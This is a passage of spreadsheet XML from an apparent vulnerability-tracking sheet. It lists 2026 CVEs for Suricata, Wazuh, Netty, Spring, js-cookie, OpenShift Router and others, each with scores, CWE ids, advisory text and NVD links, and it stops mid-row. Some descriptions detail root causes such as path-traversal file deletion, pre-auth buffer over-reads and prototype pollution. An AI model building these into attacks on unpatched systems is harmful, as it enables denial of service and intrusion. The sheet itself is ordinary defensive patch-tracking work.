    <row r="2611">
      <c r="A2611" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45765</t>
        </is>
      </c>
      <c r="C2611" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2611" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2611" s="5" t="inlineStr"/>
      <c r="F2611" s="5" t="inlineStr"/>
      <c r="G2611" s="5" t="inlineStr"/>
      <c r="H2611" s="5" t="inlineStr"/>
      <c r="I2611" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2611" s="5" t="inlineStr"/>
      <c r="K2611" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2611" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, DNP3 reassembly could buffer data without sufficient parser-level bounds. Crafted DNP3 traffic may cause Suricata to consume excessive memory, potentially resulting in denial of service. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, disable DNP3 (which is not enabled by default) if it is not needed, and/or define a limited `stream.reassembly.depth` (0 or absent is unlimited).</t>
        </is>
      </c>
      <c r="M2611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45765</t>
        </is>
      </c>
    </row>
    <row r="2612">
      <c r="A2612" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45766</t>
        </is>
      </c>
      <c r="C2612" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2612" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2612" s="5" t="inlineStr"/>
      <c r="F2612" s="5" t="inlineStr"/>
      <c r="G2612" s="5" t="inlineStr"/>
      <c r="H2612" s="5" t="inlineStr"/>
      <c r="I2612" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2612" s="5" t="inlineStr"/>
      <c r="K2612" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2612" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, certain NFS parser state structures were insufficiently bounded. Crafted NFS traffic may cause Suricata to consume excessive memory, potentially resulting in denial of service. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, disable NFS application-layer parsing if it is not needed.</t>
        </is>
      </c>
      <c r="M2612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45766</t>
        </is>
      </c>
    </row>
    <row r="2613">
      <c r="A2613" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45768</t>
        </is>
      </c>
      <c r="C2613" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2613" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2613" s="5" t="inlineStr"/>
      <c r="F2613" s="5" t="inlineStr"/>
      <c r="G2613" s="5" t="inlineStr"/>
      <c r="H2613" s="5" t="inlineStr"/>
      <c r="I2613" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2613" s="5" t="inlineStr"/>
      <c r="K2613" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2613" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Starting in version 8.0.0 and prior to version 8.0.5, LDAP transaction state could store an unbounded number of responses. Because LDAP can be processed over UDP, crafted traffic may cause Suricata to consume excessive memory, potentially resulting in denial of service. Version 8.0.5 contains a fix. As a workaround, disable LDAP application-layer parsing where it is not required. Alternatively, use a rule like `alert ldap any any -&gt; any any (sid: 1; ldap.responses.count: &gt;1024; bypass;)`.</t>
        </is>
      </c>
      <c r="M2613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45768</t>
        </is>
      </c>
    </row>
    <row r="2614">
      <c r="A2614" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45769</t>
        </is>
      </c>
      <c r="C2614" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2614" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2614" s="5" t="inlineStr"/>
      <c r="F2614" s="5" t="inlineStr"/>
      <c r="G2614" s="5" t="inlineStr"/>
      <c r="H2614" s="5" t="inlineStr"/>
      <c r="I2614" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2614" s="5" t="inlineStr"/>
      <c r="K2614" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2614" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5,IKEv2 parser state could grow without bounds while storing client transforms. Repeated crafted UDP traffic may cause Suricata to consume excessive memory, potentially resulting in denial of service. Versions 7.0.16 and 8.0.5 fix the issue. Some workarounds are available. Disable IKE application-layer parsing if it is not needed. Alternatively, use a rule to bypass ike flows after the first packets like `alert ike any any -&gt; any any (sid: 2; flow.pkts_toserver: &gt; 256; bypass; noalert;)`.</t>
        </is>
      </c>
      <c r="M2614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45769</t>
        </is>
      </c>
    </row>
    <row r="2615">
      <c r="A2615" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45770</t>
        </is>
      </c>
      <c r="C2615" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2615" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2615" s="5" t="inlineStr"/>
      <c r="F2615" s="5" t="inlineStr"/>
      <c r="G2615" s="5" t="inlineStr"/>
      <c r="H2615" s="5" t="inlineStr"/>
      <c r="I2615" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2615" s="5" t="inlineStr"/>
      <c r="K2615" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-787</t>
        </is>
      </c>
      <c r="L2615" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Starting in version 8.0.0 and prior to version 8.0.5, a Lua rule that registers too many flow variables can corrupt Lua detection state and may bypass Suricata's restricted Lua sandbox. This requires an affected Lua script/rule to be loaded. Excessive flow variables being registered may also cause Suricata to crash. Version 8.0.5 contains a fix. As a workaround, disable `security.lua.allow-rules` unless Lua rules are required.</t>
        </is>
      </c>
      <c r="M2615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45770</t>
        </is>
      </c>
    </row>
    <row r="2616">
      <c r="A2616" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45798</t>
        </is>
      </c>
      <c r="C2616" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2616" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2616" s="5" t="inlineStr"/>
      <c r="F2616" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2616" s="5" t="inlineStr"/>
      <c r="H2616" s="5" t="inlineStr"/>
      <c r="I2616" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2616" s="5" t="inlineStr"/>
      <c r="K2616" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-170</t>
        </is>
      </c>
      <c r="L2616" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.5.0 until 4.14.6 and 5.0.0-beta2, compare_wazuh_versions() in src/shared/version_op.c copies the attacker-controlled enrollment V: field into a 10-byte stack buffer with strncpy() but does not explicitly terminate the buffer. The function is reachable before authentication through wazuh-authd on TCP port 1515 when anonymous TLS enrollment is enabled. A version string of at least nine non-null bytes can cause strchr() and strtok() to read beyond ver2 and can make strtok() write a null byte into adjacent stack memory, allowing a remote denial of service. This issue is fixed in versions 4.14.6 and 5.0.0-beta2.</t>
        </is>
      </c>
      <c r="M2616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45798</t>
        </is>
      </c>
    </row>
    <row r="2617">
      <c r="A2617" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46340</t>
        </is>
      </c>
      <c r="C2617" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2617" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2617" s="5" t="inlineStr"/>
      <c r="F2617" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2617" s="5" t="inlineStr"/>
      <c r="H2617" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2617" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J2617" s="5" t="inlineStr"/>
      <c r="K2617" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2617" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. In versions of netty-transport-sctp prior to 4.1.135.Final and 4.2.15.Final, for each non-complete SctpMessage fragment the handler does `fragments.put(streamId, Unpooled.wrappedBuffer(frag, byteBuf))`, wrapping the previous accumulator and the new slice into a *new* CompositeByteBuf every time. After N fragments the accumulator is an N-deep chain of composites, each holding references and component arrays; readableBytes()/getBytes() on the final buffer recurse N levels. There is no limit on N, on total bytes, or on the number of streamIdentifiers an attacker can open (each gets its own map entry). A peer that never sets the `complete` flag can grow this structure indefinitely from tiny 1-byte DATA chunks. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M2617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46340</t>
        </is>
      </c>
    </row>
    <row r="2618">
      <c r="A2618" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46343</t>
        </is>
      </c>
      <c r="C2618" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2618" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2618" s="5" t="inlineStr"/>
      <c r="F2618" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2618" s="5" t="inlineStr"/>
      <c r="H2618" s="5" t="inlineStr"/>
      <c r="I2618" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2618" s="5" t="inlineStr"/>
      <c r="K2618" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2618" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.0.0 until 4.14.6 and 5.0.0-beta2, WazuhCommon.end_receiving_file() in framework/wazuh/core/cluster/common.py allows a cluster-authenticated node to delete files outside WAZUH_PATH. A syn_i_w_m_e request with an unknown task_id reaches the cleanup branch, where an attacker-controlled filename is passed to os.path.join without canonicalization or confinement. Absolute paths and traversal sequences can therefore target files such as ossec.conf, jwt_secret.json, TLS certificates, and ruleset files that are accessible to the Wazuh manager process. Deletion can disable the manager, invalidate API tokens, or disrupt cluster and API connectivity. This issue is fixed in versions 4.14.6 and 5.0.0-beta2.</t>
        </is>
      </c>
      <c r="M2618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46343</t>
        </is>
      </c>
    </row>
    <row r="2619">
      <c r="A2619" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46369</t>
        </is>
      </c>
      <c r="C2619" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2619" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2619" s="5" t="inlineStr"/>
      <c r="F2619" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2619" s="5" t="inlineStr"/>
      <c r="H2619" s="5" t="inlineStr"/>
      <c r="I2619" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2619" s="5" t="inlineStr"/>
      <c r="K2619" s="5" t="inlineStr">
        <is>
          <t>CWE-193, CWE-294</t>
        </is>
      </c>
      <c r="L2619" s="5" t="inlineStr">
        <is>
          <t>Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Through 1.5.0, the validity store uses a strict lower-bound comparison that expires a stored transaction too early relative to Transaction::is_valid_at, allowing a remote attacker to replay the same signed transaction during a blocks_per_batch minus one block window and cause the sender and recipient balances to be updated twice. This issue is fixed in version 1.5.1.</t>
        </is>
      </c>
      <c r="M2619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46369</t>
        </is>
      </c>
    </row>
    <row r="2620">
      <c r="A2620" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46387</t>
        </is>
      </c>
      <c r="C2620" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2620" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2620" s="5" t="inlineStr"/>
      <c r="F2620" s="5" t="inlineStr"/>
      <c r="G2620" s="5" t="inlineStr"/>
      <c r="H2620" s="5" t="inlineStr"/>
      <c r="I2620" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2620" s="5" t="inlineStr"/>
      <c r="K2620" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L2620" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, Suricata's HTTP/2 decompression path could grow the decompressed response-body buffer without an effective upper bound. A crafted HTTP/2 DATA payload using a high compression ratio, such as gzip, deflate, or brotli compressed data, could cause Suricata to allocate excessive memory while decompressing the payload. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, disable HTTP2.</t>
        </is>
      </c>
      <c r="M2620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46387</t>
        </is>
      </c>
    </row>
    <row r="2621">
      <c r="A2621" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46579</t>
        </is>
      </c>
      <c r="C2621" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2621" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2621" s="5" t="inlineStr"/>
      <c r="F2621" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2621" s="5" t="inlineStr"/>
      <c r="H2621" s="5" t="inlineStr">
        <is>
          <t>redhat:openshift_container_platform, redhat:openshift_router</t>
        </is>
      </c>
      <c r="I2621" s="5" t="inlineStr">
        <is>
          <t>2026-05-29</t>
        </is>
      </c>
      <c r="J2621" s="5" t="inlineStr"/>
      <c r="K2621" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L2621" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the OpenShift Router. When a Route has `insecureEdgeTerminationPolicy` set to Allow, the HTTP frontend does not remove `X-SSL-Client-*` headers from incoming requests. This allows an unauthenticated attacker to send plain HTTP requests with crafted `X-SSL-Client-*` headers. As a result, backends relying on these headers for mutual TLS (Transport Layer Security) authentication can be bypassed, enabling the attacker to impersonate client certificate identities.</t>
        </is>
      </c>
      <c r="M2621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46579</t>
        </is>
      </c>
    </row>
    <row r="2622">
      <c r="A2622" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46625</t>
        </is>
      </c>
      <c r="C2622" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2622" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2622" s="5" t="inlineStr"/>
      <c r="F2622" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2622" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2622" s="5" t="inlineStr">
        <is>
          <t>js-cookie:javascript_cookie, redhat:3scale_api_management, redhat:ansible_automation_platform, redhat:enterprise_linux, redhat:openshift_ai, redhat:openshift_lightspeed</t>
        </is>
      </c>
      <c r="I2622" s="5" t="inlineStr">
        <is>
          <t>2026-06-10</t>
        </is>
      </c>
      <c r="J2622" s="5" t="inlineStr"/>
      <c r="K2622" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-915</t>
        </is>
      </c>
      <c r="L2622" s="5" t="inlineStr">
        <is>
          <t>JavaScript Cookie is a JavaScript API for handling cookies, client-side. Prior to version 3.0.7, js-cookie's internal assign() helper copies properties with for...in + plain assignment. When the source object is produced by JSON.parse, the JSON object's "__proto__" member is an own enumerable property, so the for…in enumerates it and the target[key] = source[key] write triggers the Object.prototype.__proto__ setter on the fresh target ({}). The result is a per-instance prototype hijack: Object.prototype itself is untouched, but the merged attributes object now inherits attacker-controlled keys. Because the consuming set() function then enumerates the merged object with another for...in, every key the attacker placed on the polluted prototype lands in the resulting Set-Cookie string as an attribute pair. The attacker can set domain=, secure=, samesite=, expires=, and path= on cookies whose attributes the developer thought were locked down. This issue has been patched in version 3.0.7.</t>
        </is>
      </c>
      <c r="M2622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46625</t>
        </is>
      </c>
    </row>
    <row r="2623">
      <c r="A2623" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47249</t>
        </is>
      </c>
      <c r="C2623" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2623" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2623" s="5" t="inlineStr"/>
      <c r="F2623" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2623" s="5" t="inlineStr"/>
      <c r="H2623" s="5" t="inlineStr"/>
      <c r="I2623" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2623" s="5" t="inlineStr"/>
      <c r="K2623" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2623" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.18, the P2P resolver request handling logic is vulnerable to hash-array amplification. A connected peer can send a compressed RequestDataType_HashArrayType direct request that is only 442 bytes on the wire but expands into 200,000 decoded hash entries inside the resolver path. The resolver's antiflood logic counts only a single logical message and the compressed wire size, and while Batch.Decompress() caps the decompressed byte size, it never limits the number of decoded repeated-field items. As a result, both TxResolver and TrieNodeResolver preallocate and iterate over the entire unchecked set of decoded hashes, causing remote memory and CPU amplification against any node that accepts P2P peer connections. This issue is fixed in version 1.7.18.</t>
        </is>
      </c>
      <c r="M2623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47249</t>
        </is>
      </c>
    </row>
    <row r="2624">
      <c r="A2624" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47625</t>
        </is>
      </c>
      <c r="C2624" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2624" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2624" s="5" t="inlineStr"/>
      <c r="F2624" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2624" s="5" t="inlineStr"/>
      <c r="H2624" s="5" t="inlineStr"/>
      <c r="I2624" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2624" s="5" t="inlineStr"/>
      <c r="K2624" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2624" s="5" t="inlineStr">
        <is>
          <t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could abuse missing authorization. A successful exploit of this vulnerability might lead to information disclosure, data tampering, and denial of service.</t>
        </is>
      </c>
      <c r="M2624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47625</t>
        </is>
      </c>
    </row>
    <row r="2625">
      <c r="A2625" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47885</t>
        </is>
      </c>
      <c r="C2625" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2625" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2625" s="5" t="inlineStr"/>
      <c r="F2625" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2625" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H2625" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I2625" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2625" s="5" t="inlineStr"/>
      <c r="K2625" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2625" s="5" t="inlineStr">
        <is>
          <t>The PartEventHttpMessageReader in Spring WebFlux does not enforce the maxPartSize limit when maxInMemorySize is set to -1.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19
Spring Framework 6.1.0 - 6.1.28</t>
        </is>
      </c>
      <c r="M2625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47885</t>
        </is>
      </c>
    </row>
    <row r="2626">
      <c r="A2626" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47886</t>
        </is>
      </c>
      <c r="C2626" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2626" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2626" s="5" t="inlineStr"/>
      <c r="F2626" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2626" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H2626" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I2626" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2626" s="5" t="inlineStr"/>
      <c r="K2626" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2626" s="5" t="inlineStr">
        <is>
          <t>Applications that evaluate user-supplied Spring Expression Language (SpEL) expressions may be vulnerable to a Denial of Service (DoS) attack when the power operator (^) is used with a BigDecimal or BigInteger operand and a large exponent value.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19
Spring Framework 6.1.0 - 6.1.28
Spring Framework 6.0.0 - 6.0.30
Spring Framework 5.3.0 - 5.3.49
Spring Framework 5.2.25.RELEASE and earlier</t>
        </is>
      </c>
      <c r="M2626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47886</t>
        </is>
      </c>
    </row>
    <row r="2627">
      <c r="A2627" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47888</t>
        </is>
      </c>
      <c r="C2627" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2627" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2627" s="5" t="inlineStr"/>
      <c r="F2627" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2627" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H2627" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I2627" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2627" s="5" t="inlineStr"/>
      <c r="K2627" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L2627" s="5" t="inlineStr">
        <is>
          <t>A Spring RSocket application is exposed to a memory leak via a malformed SETUP frame.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19
Spring Framework 6.1.0 - 6.1.28
Spring Framework 6.0.0 - 6.0.30
Spring Framework 5.3.0 - 5.3.49
Spring Framework 5.2.0.RELEASE - 5.2.25.RELEASE</t>
        </is>
      </c>
      <c r="M2627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47888</t>
        </is>
      </c>
    </row>
    <row r="2628">
      <c r="A2628" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47889</t>
        </is>
      </c>
      <c r="C2628" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2628" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2628" s="5" t="inlineStr"/>
      <c r="F2628" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2628" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H2628" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I2628" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2628" s="5" t="inlineStr"/>
      <c r="K2628" s="5" t="inlineStr">
        <is>
          <t>CWE-1275</t>
        </is>
      </c>
      <c r="L2628" s="5" t="inlineStr">
        <is>
          <t>A WebFlux application running on the Jetty 12 Core reactive adapter serializes response cookies without the sameSite attribute.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19</t>
        </is>
      </c>
      <c r="M2628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47889</t>
        </is>
      </c>
    </row>
    <row r="2629">
      <c r="A2629" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47895</t>
        </is>
      </c>
      <c r="C2629" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2629" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2629" s="5" t="inlineStr"/>
      <c r="F2629" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2629" s="5" t="inlineStr"/>
      <c r="H2629" s="5" t="inlineStr"/>
      <c r="I2629" s="5" t="inlineStr">
        <is>
          <t>2026-08-22</t>
        </is>
      </c>
      <c r="J2629" s="5" t="inlineStr"/>
      <c r="K2629" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L2629" s="5" t="inlineStr">
        <is>
          <t>In strongSwan before 6.0.7, identity parsing/cloning is mishandled. Parsed EAP-Identities that result in an empty but non-NULL encoding are not correctly cloned and trigger a double-free once the duplicates are destroyed.</t>
        </is>
      </c>
      <c r="M2629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47895</t>
        </is>
      </c>
    </row>
    <row r="2630">
      <c r="A2630" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48043</t>
        </is>
      </c>
      <c r="C2630" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2630" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2630" s="5" t="inlineStr"/>
      <c r="F2630" s="5" t="n">
